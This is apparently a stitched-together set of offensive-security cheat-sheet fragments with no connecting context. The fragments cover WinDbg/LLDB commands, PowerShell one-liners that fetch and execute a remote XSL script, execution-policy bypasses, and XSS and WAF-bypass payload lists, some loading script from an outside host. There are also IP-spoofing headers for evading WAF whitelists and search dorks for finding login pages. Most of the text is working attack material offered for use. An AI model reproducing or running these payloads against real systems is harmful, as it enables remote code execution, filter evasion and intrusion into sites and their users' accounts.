| Command | WinDbg | LLDB |
|---|---|---|
| Start | windbg {executable} [{args}] |
lldb {executable} [--args] |
| Attach | windbg -p {pid} |
lldb --attach-pid {pid} |
| Command | WinDbg | LLDB |
|---|---|---|
| (Re)load symbols | lb {module-name} |
target symbols add {symbol-file-path} |
| #include <Windows.h> | |
| #include <Psapi.h> | |
| #include <metahost.h> | |
| #include <comutil.h> | |
| #include <mscoree.h> | |
| #include "patch_info.h" | |
| #include "base\helpers.h" | |
| /** | |
| * For the debug build we want: |
| ############################################################################## | |
| ### Powershell Xml/Xsl Assembly "Fetch & Execute" | |
| ### [https://twitter.com/bohops/status/966172175555284992] | |
| $s=New-Object System.Xml.Xsl.XsltSettings;$r=New-Object System.Xml.XmlUrlResolver;$s.EnableScript=1;$x=New-Object System.Xml.Xsl.XslCompiledTransform;$x.Load('https://gist.github.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/f8245f99992eff00eb5f0d5738dfbf0937daf5e4/xsl-notepad.xsl',$s,$r);$x.Transform('https://gist.github.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/f8245f99992eff00eb5f0d5738dfbf0937daf5e4/xsl-notepad.xml','z');del z; | |
| ############################################################################## | |
| ### Powershell VBScript Assembly SCT "Fetch & Execute" | |
| ### [https://twitter.com/bohops/status/965670898379476993] |
| https://www.netspi.com/blog/technical/network-penetration-testing/15-ways-to-bypass-the-powershell-execution-policy/ | |
| powershell.exe -ExecutionPolicy Bypass | |
| PowerShell.exe -ExecutionPolicy Bypass -File .runme.ps1 | |
| PowerShell.exe -ExecutionPolicy UnRestricted -File .runme.ps1 | |
| PowerShell.exe -ExecutionPolicy Remote-signed -File .runme.ps1 | |
| Echo Write-Host "My voice is my passport, verify me." | PowerShell.exe -noprofile - | |
| powershell.exe -Enc VwByAGkAdABlAC0ASABvAHMAdAAgACcATQB5ACAAdgBvAGkAYwBlACAAaQBzACAAbQB5ACAAcABhAHMAcwBwAG8AcgB0ACwAIAB2AGUAcgBpAGYAeQAgAG0AZQAuACcA | |
| Set-ExecutionPolicy Bypass -Scope Process |
<!-- Source: https://www.openbugbounty.org/blog/ismailtsdln/everything-about-xss-is-in-this-source/ -->
<script\x20type="text/javascript">javascript:alert(1);</script>
<script\x3Etype="text/javascript">javascript:alert(1);</script>
<script\x0Dtype="text/javascript">javascript:alert(1);</script>
<script\x09type="text/javascript">javascript:alert(1);</script>
<script\x0Ctype="text/javascript">javascript:alert(1);</script>
<script\x2Ftype="text/javascript">javascript:alert(1);</script>
<script\x0Atype="text/javascript">javascript:alert(1);</script>
| CACHE_INFO: 127.0.0.1 | |
| CF_CONNECTING_IP: 127.0.0.1 | |
| CF-Connecting-IP: 127.0.0.1 | |
| CLIENT_IP: 127.0.0.1 | |
| Client-IP: 127.0.0.1 | |
| COMING_FROM: 127.0.0.1 | |
| CONNECT_VIA_IP: 127.0.0.1 | |
| FORWARD_FOR: 127.0.0.1 | |
| FORWARD-FOR: 127.0.0.1 | |
| FORWARDED_FOR_IP: 127.0.0.1 |
| - X-forwarded-for | |
| - X-remote-IP | |
| - X-originating-IP | |
| - x-remote-addr | |
| waf通常会有一个不拦截任意请求的白名单ip,上面的几个头可以用来伪造ip | |
| 如: | |
| X-Forwarded-For: 127.0.0.1 | |
| X-Remote-Ip: 127.0.0.1 | |
| X-Originating-Ip: 127.0.0.1 | |
| X-Remote-Addr: 127.0.0.1 |
| @vanshitmalhotra | Bypass AWS WAF -// | |
| Add "<!" (without quotes) before your payload and bypass that WAF. :) | |
| eg: <!<script>confirm(1)</script> | |
| @black0x00mamba | Bypass WAF Akamaighost & filtered onload, onclick, href, src, onerror, script, etc | |
| <img sr%00c=x o%00nerror=((pro%00mpt(1)))> | |
| DotDefender WAF bypass by @0xInfection | |
| <bleh/ondragstart=	parent	['open']	()%20draggable=True>dragme |
| ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> | |
| '';!--"<XSS>=&{()} | |
| 0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-" | |
| <script/src=data:,alert()> | |
| <marquee/onstart=alert()> | |
| <video/poster/onerror=alert()> | |
| <isindex/autofocus/onfocus=alert()> | |
| <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> | |
| <IMG SRC="javascript:alert('XSS');"> | |
| <IMG SRC=javascript:alert('XSS')> |
| site:*/sign-in | |
| site:*/account/login | |
| site:*/forum/ucp.php?mode=login | |
| inurl:memberlist.php?mode=viewprofile | |
| intitle:"EdgeOS" intext:"Please login" | |
| inurl:user_login.php | |
| intitle:"Web Management Login" | |
| site:*/users/login_form | |
| site:*/access/unauthenticated | |
| site:account.*.*/login |